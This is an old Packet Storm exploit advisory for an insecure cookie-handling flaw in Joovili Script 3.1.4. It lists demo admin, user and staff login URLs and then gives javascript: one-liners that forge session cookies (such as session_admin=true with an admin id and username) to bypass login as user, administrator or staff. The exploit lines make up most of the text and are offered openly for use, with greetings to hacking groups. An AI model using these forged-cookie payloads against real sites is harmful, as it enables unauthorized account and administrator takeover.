joovili-insecure.txt

2008-11-04T00:00:00
ID PACKETSTORM:71488
Type packetstorm
Reporter ZoRLu
Modified 2008-11-04T00:00:00

Description

                                        
                                            `[~] Joovili Script Insecure Cookie Handling Vulnerability  
[~]  
[~] version: 3.1.4   
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 02.11.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] contact: trt-turk@hotmail.com  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~]   
[~] N0T: a.q kpss : ) )  
[~]  
[~] ----------------------------------------------------------  
  
demo admin login:  
  
http://demo.joovili.com/admin  
  
demo user login:  
  
http://demo.joovili.com/  
  
demo staff login:  
  
http://demo.joovili.com/staff/  
  
  
exploit for user:  
  
javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";   
  
  
for demo user:  
  
javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";  
  
for demo admin:  
  
javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";  
  
for demo staff:  
  
javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & all Muslim HaCkeRs  
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
`